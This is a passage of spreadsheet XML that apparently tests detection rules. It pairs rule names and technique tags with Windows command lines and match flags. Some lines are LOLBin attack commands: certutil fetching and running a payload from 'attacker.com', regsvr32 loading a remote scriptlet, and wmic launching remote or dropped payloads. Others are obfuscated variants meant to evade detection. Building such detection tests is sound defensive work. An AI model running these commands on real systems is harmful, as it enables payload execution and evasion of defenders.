      </c>
      <c r="D4076" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4076" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C powershell.exe -"nop" -EP bypass -C "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4076" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4076" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4076" s="43" t="n"/>
      <c r="K4076" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4077" ht="15.75" customHeight="1" s="42">
      <c r="A4077" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4077" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C4077" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D4077" s="43" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E4077" s="43" t="inlineStr">
        <is>
          <t>wmic.exe process call create "\\192.168.1.50\DavWWWRoot\share\payload.exe"</t>
        </is>
      </c>
      <c r="F4077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4077" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4077" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4077" s="43" t="n"/>
      <c r="K4077" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4078" ht="15.75" customHeight="1" s="42">
      <c r="A4078" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4078" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C4078" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D4078" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E4078" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKCU\Software\Microsoft\Office\16.0\Outlook\Security /v EnableUn^safeClientMailRules /t REG_DWORD /d 1 /f"</t>
        </is>
      </c>
      <c r="F4078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4078" s="43" t="n"/>
      <c r="J4078" s="43" t="n"/>
      <c r="K4078" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4079" ht="15.75" customHeight="1" s="42">
      <c r="A4079" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4079" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C4079" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D4079" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E4079" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F4079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4079" s="43" t="n"/>
      <c r="J4079" s="43" t="n"/>
      <c r="K4079" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4080" ht="15.75" customHeight="1" s="42">
      <c r="A4080" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4080" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C4080" s="43" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D4080" s="43" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E4080" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "certutil.exe -urlcache -f http://attacker.com/payload.exe C:\temp\p.exe &amp;&amp; C:\temp\p.exe"</t>
        </is>
      </c>
      <c r="F4080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4080" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4080" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J4080" s="43" t="n"/>
      <c r="K4080" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4081" ht="15.75" customHeight="1" s="42">
      <c r="A4081" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4081" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C4081" s="43" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D4081" s="43" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E4081" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "powershell.exe -Command Write-Host 'Malicious Payload Executed'"</t>
        </is>
      </c>
      <c r="F4081" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4081" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4081" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4081" s="43" t="n"/>
      <c r="J4081" s="43" t="n"/>
      <c r="K4081" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4082" ht="15.75" customHeight="1" s="42">
      <c r="A4082" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4082" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4082" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4082" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4082" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F4082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4082" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4082" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4082" s="43" t="n"/>
      <c r="K4082" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4083" ht="15.75" customHeight="1" s="42">
      <c r="A4083" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4083" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4083" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4083" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4083" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4083" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4083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83" s="43" t="n"/>
      <c r="K4083" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4084" ht="15.75" customHeight="1" s="42">
      <c r="A4084" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4084" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4084" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4084" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4084" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4084" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4084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84" s="43" t="n"/>
      <c r="K4084" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4085" ht="15.75" customHeight="1" s="42">
      <c r="A4085" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4085" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4085" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4085" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4085" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4085" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4085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85" s="43" t="n"/>
      <c r="K4085" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4086" ht="15.75" customHeight="1" s="42">
      <c r="A4086" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4086" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4086" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4086" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4086" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4086" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4086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86" s="43" t="n"/>
      <c r="K4086" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4087" ht="15.75" customHeight="1" s="42">
      <c r="A4087" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4087" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4087" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4087" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4087" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4087" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4087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87" s="43" t="n"/>
      <c r="K4087" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4088" ht="15.75" customHeight="1" s="42">
      <c r="A4088" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4088" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4088" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4088" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4088" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript /"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4088" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4088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88" s="43" t="n"/>
      <c r="K4088" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4089" ht="15.75" customHeight="1" s="42">
      <c r="A4089" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4089" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4089" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4089" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4089" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4089" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4089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89" s="43" t="n"/>
      <c r="K4089" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4090" ht="15.75" customHeight="1" s="42">
      <c r="A4090" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4090" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4090" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4090" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4090" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nOloGo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4090" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4090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0" s="43" t="n"/>
      <c r="K4090" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4091" ht="15.75" customHeight="1" s="42">
      <c r="A4091" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4091" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4091" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4091" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4091" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4091" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4091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91" s="43" t="n"/>
      <c r="K4091" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4092" ht="15.75" customHeight="1" s="42">
      <c r="A4092" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4092" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4092" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4092" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4092" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4092" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4092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92" s="43" t="n"/>
      <c r="K4092" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4093" ht="15.75" customHeight="1" s="42">
      <c r="A4093" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4093" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4093" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4093" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4093" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F4093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4093" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4093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093" s="43" t="n"/>
      <c r="K4093" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4094" ht="15.75" customHeight="1" s="42">
      <c r="A4094" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4094" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4094" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4094" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4094" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F4094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4094" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4094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4" s="43" t="n"/>
      <c r="K4094" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4095" ht="15.75" customHeight="1" s="42">
      <c r="A4095" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4095" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4095" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4095" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4095" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F4095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4095" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4095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5" s="43" t="n"/>
      <c r="K4095" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4096" ht="15.75" customHeight="1" s="42">
      <c r="A4096" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4096" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4096" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4096" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4096" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F4096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4096" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4096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6" s="43" t="n"/>
      <c r="K4096" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4097" ht="15.75" customHeight="1" s="42">
      <c r="A4097" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4097" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4097" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4097" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4097" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F4097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4097" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4097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7" s="43" t="n"/>
      <c r="K4097" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4098" ht="15.75" customHeight="1" s="42">
      <c r="A4098" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4098" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4098" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4098" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4098" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /u"</t>
        </is>
      </c>
      <c r="F4098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4098" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4098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8" s="43" t="n"/>
      <c r="K4098" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4099" ht="15.75" customHeight="1" s="42">
      <c r="A4099" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4099" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4099" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4099" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4099" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /U"</t>
        </is>
      </c>
      <c r="F4099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4099" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4099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099" s="43" t="n"/>
      <c r="K4099" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4100" ht="15.75" customHeight="1" s="42">
      <c r="A4100" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4100" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4100" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4100" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4100" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F4100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4100" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4100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100" s="43" t="n"/>
      <c r="K4100" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4101" ht="15.75" customHeight="1" s="42">
      <c r="A4101" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4101" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4101" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4101" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4101" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F4101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4101" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4101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101" s="43" t="n"/>
      <c r="K4101" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4102" ht="15.75" customHeight="1" s="42">
      <c r="A4102" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4102" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4102" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4102" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4102" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F4102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4102" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4102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102" s="43" t="n"/>
      <c r="K4102" s="43" t="b">
        <v>0</v>
      </c>
    </row>
